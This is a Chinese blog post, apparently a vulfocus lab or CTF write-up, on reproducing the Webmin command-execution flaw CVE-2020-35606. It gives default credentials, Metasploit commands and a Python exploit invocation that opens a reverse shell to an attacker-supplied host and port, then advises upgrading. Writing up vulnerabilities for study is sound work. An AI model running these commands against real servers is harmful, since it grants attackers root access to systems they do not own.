栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

Webmin 命令执行漏洞 (CVE-2020-35606)

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Webmin 命令执行漏洞 (CVE-2020-35606)

Webmin 命令执行漏洞 (CVE-2020-35606)
  • Webmin 命令执行漏洞 (CVE-2020-35606)
    • 0x01 漏洞描述
    • 0x02 影响范围
    • 0x03 漏洞复现
      • 使用msf复现
      • 利用脚本 成功
    • 0x04 漏洞修复

Webmin 命令执行漏洞 (CVE-2020-35606) 0x01 漏洞描述

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。 账户密码:root:password

CVE-2020-35606使用的还是CVE-2019-12840的执行脚本,换了新的载体,利用方式还是一样的

https://ip:port/session_login.cgi

0x02 影响范围

Webmin 1.962版本及之前版本

0x03 漏洞复现 使用msf复现

脚本地址

https://github.com/puckiestyle/CVE-2020-35606


下载下导入msf后 relod_all 失败 后来将文件名改为

webmin_pu_escape_bypass_rce.rb

重启msfconsole 导入成功 不知道是不是文件名原因
导入msf方法

使用脚本

search webmin
use 6
info   查看脚本信息
set rhosts 118.193.36.37
set rport 9720(一般是10000)
set ssl true  (开启ssl就设为true)
set username root      # 运行时提示 要账号密码 就又加上
set password password  
check  #检查是否存在漏洞


漏洞存在

反弹shell 的话

在之前基础上 
set lhost vps的ip
run

不知道为什么创建会话失败

利用脚本 成功

webmin_cve-2019-12840_poc
脚本地址

https://github.com/KrE80r/webmin_cve-2019-12840_poc

python3运行

使用前注意修改 py文件中的 121行的端口号

反弹shell

python CVE-2019-12840.py -u https://vulfocus.fofa.so -U root -P password -lhost x.x.x.x -lport 9897


脚本反弹shell成功
flag获取

0x04 漏洞修复

升级到最新版本

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/487651.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号